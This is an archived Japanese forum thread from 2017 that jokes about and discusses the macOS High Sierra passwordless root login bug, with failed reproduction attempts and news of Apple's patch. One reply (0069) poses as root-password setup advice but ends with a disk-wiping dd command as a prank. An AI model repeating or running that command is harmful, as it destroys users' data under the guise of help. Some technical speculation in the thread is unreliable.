X



Mac「アンロックボタン連打でrootログインできる絶望的な脆弱性ワロタ
■ このスレッドは過去ログ倉庫に格納されています
0001名無しさん@涙目です。(北海道) [JP]
垢版 |
NGNG?PLT(12015)

米CNETは、このセキュリティ脆弱性の存在を独自に確認し、Appleにコメントを求めた。
同社からの回答は直ちには得られなかった。

このシンプルな脆弱性は、いかに強力なパスワードを設定しようとも、
macOS High Sierra搭載端末に実際に触れることのできる任意の人物が、
そのコンピュータにログインできることを意味する。

https://cnet2.cbsistatic.com/img/pWUGzyw4LDoQjV60VSy5n5rdwAk=/fit-in/570x0/2017/11/28/911f0586-e6ae-4638-88f8-eb775a0a098f/low-qual.gif

https://japan.cnet.com/article/35111084/
0009名無しさん@涙目です。(庭) [US]
垢版 |
2017/11/29(水) 10:06:00.58ID:eBGuwRbB0
0012名無しさん@涙目です。(庭) [EU]
垢版 |
2017/11/29(水) 10:07:44.91ID:UYSqTA920
Shiftキー5回連打するようなもんか
0013名無しさん@涙目です。(新疆ウイグル自治区) [ニダ]
垢版 |
2017/11/29(水) 10:08:45.89ID:43SPh70R0
試してみたけど再現しなかった

ユーザ名をrootにして「ロックを解除」をクリック

ダイアログがグレイアウトする(クリック不可)

3秒ぐらい経ってからダイアログが振動

解除されず最初の状態(自分のユーザ名が入力されている状態)に戻る
0015名無しさん@涙目です。(大阪府) [US]
垢版 |
2017/11/29(水) 10:10:11.21ID:POFCx9kf0
elcapitanの俺様セーフ
0016名無しさん@涙目です。(島根県) [IT]
垢版 |
2017/11/29(水) 10:11:53.70ID:xiKDGZxc0
>>11
しゅごキャラ?
0021名無しさん@涙目です。(空) [US]
垢版 |
2017/11/29(水) 10:13:53.18ID:F/AzsOv20
できないぞ?
0022名無しさん@涙目です。(dion軍) [US]
垢版 |
2017/11/29(水) 10:14:13.36ID:MOP/U1+l0
誰でもアンロック!そうMacOSならね!
0027名無しさん@涙目です。(やわらか銀行) [US]
垢版 |
2017/11/29(水) 10:19:20.19ID:k89RkGbA0
>>1
こうならないんだけど
このひとのMacどうなってんのかな
0028名無しさん@涙目です。(アメリカ合衆国) [US]
垢版 |
2017/11/29(水) 10:19:38.99ID:VBNiQSVx0
連打ってどのレベルの連打なの?
ハイパーオリンピックぐらい?
定規いるじゃん
0030名無しさん@涙目です。(アメリカ合衆国) [US]
垢版 |
2017/11/29(水) 10:22:08.81ID:VBNiQSVx0
カーソルの挙動はポチポチって感じだけど
手マン筋が攣りそうなぐらいマウス連打してるとか?
0031名無しさん@涙目です。(新疆ウイグル自治区) [CN]
垢版 |
2017/11/29(水) 10:24:19.19ID:s5FpgDFN0
>>10
昔のMacのファインダーっていう標準添付のソフトなんてパスワードハッキングツールだったし
アップルは開発者が意図的に勝手に隠し機能を付けるなんてよくある事だった

後、イースターエッグでシステムクラッシュとかマヌケな事もやってる
0032名無しさん@涙目です。(茸) [CN]
垢版 |
2017/11/29(水) 10:25:05.31ID:OvG8wnMA0
>>28
俺コマンダーがある
0034名無しさん@涙目です。(やわらか銀行) [US]
垢版 |
2017/11/29(水) 10:26:34.40ID:k89RkGbA0
>>31
>昔のMacのファインダーっていう標準添付のソフトなんてパスワードハッキングツールだったし
は?
0036名無しさん@涙目です。(新潟県) [US]
垢版 |
2017/11/29(水) 10:27:42.38ID:Cq00UszE0
またもろよわせいか
0037名無しさん@涙目です。(新疆ウイグル自治区) [ニダ]
垢版 |
2017/11/29(水) 10:28:20.82ID:iHl/XTVa0
意図的に混入させないとこんな現象起こらなくね?
バグじゃないだろ
0038名無しさん@涙目です。(やわらか銀行) [ニダ]
垢版 |
2017/11/29(水) 10:28:56.11ID:L8KkQcdt0
Sierraだけど、できねーぞ
本当かよ
0040名無しさん@涙目です。(やわらか銀行) [ニダ]
垢版 |
2017/11/29(水) 10:29:42.07ID:L8KkQcdt0
High Sierra限定なのか?
週末試すかな
0044名無しさん@涙目です。(庭) [EU]
垢版 |
2017/11/29(水) 10:40:01.22ID:7gISLPbI0
もっと優しくリズミカルにやらんとダメだぞ
0045名無しさん@涙目です。(東京都) [US]
垢版 |
2017/11/29(水) 10:43:55.53ID:gk4O0ohD0
最近、高卒騙しの記事が多すぎだろ
0046名無しさん@涙目です。(茸) [EU]
垢版 |
2017/11/29(水) 10:44:26.27ID:WGE929m50
仕様だろこれ
0047名無しさん@涙目です。(関西地方) [US]
垢版 |
2017/11/29(水) 10:47:13.23ID:77afakC30
ファッキントッシュはUNIX気取りなくせに易功必落でクラックし放題なんだよ
0049名無しさん@涙目です。(SB-iPhone) [KR]
垢版 |
2017/11/29(水) 10:49:58.73ID:7XcJOYhi0
生鮮コーナーでやったら怒られて買い取らされた。
0050名無しさん@涙目です。(空) [JP]
垢版 |
2017/11/29(水) 10:50:26.31ID:PjVjMkmT0
まだ面倒くさくてHigh Sierraにしてないからセーフ
0051名無しさん@涙目です。(鹿児島県) [ニダ]
垢版 |
2017/11/29(水) 10:51:07.93ID:aY51IaJg0
フルコンボだドン!
0053名無しさん@涙目です。(dion軍) [KR]
垢版 |
2017/11/29(水) 10:53:18.45ID:AlDqSk4i0
rootユーザーを有効にしていない場合にしか発生しない
rootユーザーが無効なのになぜかパスワードなしのrootユーザーが存在することになっているという問題
0054名無しさん@涙目です。(庭) [US]
垢版 |
2017/11/29(水) 11:00:17.17ID:xFBVGodV0
連打って16連打名人クラスのレベル?
0056名無しさん@涙目です。(庭) [US]
垢版 |
2017/11/29(水) 11:03:41.42ID:lpTnodQy0
マックは遊び道具
仕事でつかってるところはもうない
まだ使ってるとしたら企業コンプライアンス問われるレベルの無能さ
0059名無しさん@涙目です。(やわらか銀行) [US]
垢版 |
2017/11/29(水) 11:09:20.21ID:k89RkGbA0
>>53
おれも無効にしてるんだけど
この状態にはならないよ?
0060名無しさん@涙目です。(庭) [US]
垢版 |
2017/11/29(水) 11:11:19.01ID:OCSh9DFL0
>>56
webのエンジニアだと一番ストレスなく使える。
windowsもbash使えるようになったから、ちょっと気にはなるが…
0062名無しさん@涙目です。(岐阜県) [US]
垢版 |
2017/11/29(水) 11:12:30.45ID:F6pU1GX20
何回やっても出来ないけど条件とかあるの?
0069名無しさん@涙目です。(東京都) [US]
垢版 |
2017/11/29(水) 13:01:10.11ID:2+XE9YiR0
rootやっちゃった場合のrootパスワード設定方法
ターミナルで sudo passwd root打ち
Password:   ←  現行アカウントのパス
Changing password for root. New password:  ←  新しいパス
Retype new password: ←  新しいパス と行い。
su - rootで設定したパスワードを入力してログイン出来たら、
dd if=/dev/null of=/dev/sdaを入力してターミナル終了。
0070名無しさん@涙目です。(チベット自治区) [US]
垢版 |
2017/11/29(水) 13:09:50.96ID:Lo2/U2ae0
>>13
0071名無しさん@涙目です。(茸) [US]
垢版 |
2017/11/29(水) 13:16:02.40ID:2rVMRvmI0
アップル社潰れるやんけ
0072名無しさん@涙目です。(茸) [US]
垢版 |
2017/11/29(水) 13:18:02.03ID:2rVMRvmI0
バグだらけ
0073名無しさん@涙目です。(栃木県) [ニダ]
垢版 |
2017/11/29(水) 13:20:14.00ID:WuOROH7F0
>>61
ワロタ
0074名無しさん@涙目です。(catv?) [US]
垢版 |
2017/11/29(水) 13:45:00.71ID:L93wW/bc0
wwwwww
0075名無しさん@涙目です。(catv?) [ニダ]
垢版 |
2017/11/29(水) 13:51:37.23ID:ehVFK8SA0
Sierraでは再現されないのでセーフ
0078名無しさん@涙目です。(茸) [CN]
垢版 |
2017/11/29(水) 15:14:44.96ID:IDK0JPmo0
誰もが自由に使える、夢のようなデバイス
0080名無しさん@涙目です。(茸) [CN]
垢版 |
2017/11/29(水) 16:12:40.87ID:Xa7/23s/0
>>32
スーパーボンバーマンの隠しステージ出すためのOP画面でX連打はコマンダー使わずにやってた
0084名無しさん@涙目です。(大阪府) [US]
垢版 |
2017/11/29(水) 18:14:36.52ID:s/GVedVU0
>>69
最後の行で、ハードディスク消去してないか?
0091名無しさん@涙目です。(catv?) [CA]
垢版 |
2017/11/30(木) 00:00:39.42ID:b+iNtlXd0
あまりにバグの話が多いんでSierraのまま様子見てたけど正解だったな
最近のAppleはちょっと動かしてみれば分かるだろーがレベルのバグが多い
0092名無しさん@涙目です。(福井県) [GB]
垢版 |
2017/11/30(木) 00:02:19.49ID:Tg1F4kFL0
高橋名人がまた逮捕されちゃう!
0094名無しさん@涙目です。(大阪府) [US]
垢版 |
2017/11/30(木) 01:16:43.43ID:B+QB1ZYq0
ジョブズがいなくなった途端に
0095名無しさん@涙目です。(catv?) [CA]
垢版 |
2017/11/30(木) 02:06:33.74ID:b+iNtlXd0
修正アップデート出たってよ
こんだけ早い対応も珍しい
0097名無しさん@涙目です。(関西地方) [US]
垢版 |
2017/11/30(木) 02:35:28.29ID:THzmFxr20
ようやく世間がファックOSXのポンコツさに気付き始めたみたいだな
0098名無しさん@涙目です。(大阪府) [ニダ]
垢版 |
2017/11/30(木) 02:38:51.21ID:avG7h0s80
>>95
そりゃそうだろ
リモート脆弱性ではないが
実機を目の前にする環境ならだれでもrootでログインなんて
rootでログイン改ざんし放題じゃないか、これ以上に迅速にパッチ作るべき脆弱性なんてあるのか
0100名無しさん@涙目です。(catv?) [US]
垢版 |
2017/11/30(木) 05:33:17.17ID:HZLgI9+W0
ユーザー追加できてる時点で管理者権限持ってんだけどね
Windows2000サーバでユーザーアカウントにAdministratorが作成できて
パスワード変更できなくなるのとかもあったなあ懐かしい
0101名無しさん@涙目です。(茸) [US]
垢版 |
2017/11/30(木) 07:26:07.60ID:L18OjwCd0
画面共有できる端末ならリモートでもrootで入れるみたい
大学のMacで片っ端からrootログインして破壊するアホとか出たりして
0103名無しさん@涙目です。(茸) [US]
垢版 |
2017/11/30(木) 07:29:26.57ID:L18OjwCd0
>>61
そもそもパスワードをハッシュ化してないのか
0104名無しさん@涙目です。(やわらか銀行) [US]
垢版 |
2017/11/30(木) 07:34:52.01ID:/VQlZ0tY0
>>103
AFPやめてSMB主体にしたあたりから
ハッシュ化しないで保存しているんじゃないかな
0105名無しさん@涙目です。(茸) [US]
垢版 |
2017/11/30(木) 07:37:18.46ID:L18OjwCd0
まともにデバッグしてないのか
0106名無しさん@涙目です。(禿) [US]
垢版 |
2017/11/30(木) 07:37:48.53ID:YAKU/XYk0
>>100
sudoでしょ。
0107名無しさん@涙目です。(やわらか銀行) [IN]
垢版 |
2017/11/30(木) 07:41:32.92ID:bUWmRjEZ0
信者にとってはポンコツでもゴミでも何でもかまわないのだ
0108名無しさん@涙目です。(大阪府) [US]
垢版 |
2017/11/30(木) 07:43:26.44ID:ZeZ2Mxi00
触れさせなければどうということはない
0112名無しさん@涙目です。(SB-iPhone) [AU]
垢版 |
2017/11/30(木) 10:25:41.74ID:Q579+d2X0
おでんツンツン男はこの事を警告していたのか!
0114名無しさん@涙目です。(catv?) [CA]
垢版 |
2017/12/01(金) 00:53:00.91ID:RuApaAYo0
修正アップデート入れたら別の不具合出てまたアップデート出しなおしたってよ
これはもうダメかもわからんね
0115名無しさん@涙目です。(やわらか銀行) [US]
垢版 |
2017/12/01(金) 01:23:20.86ID:DgZNS+pk0
>>114
Appleも堕ちたね
0116名無しさん@涙目です。(愛知県) [GB]
垢版 |
2017/12/01(金) 01:24:54.50ID:K+hRI8sJ0
拙速に修正リリースしてきたけど
他のバグが起きたりしないのかな
■ このスレッドは過去ログ倉庫に格納されています

ニューススポーツなんでも実況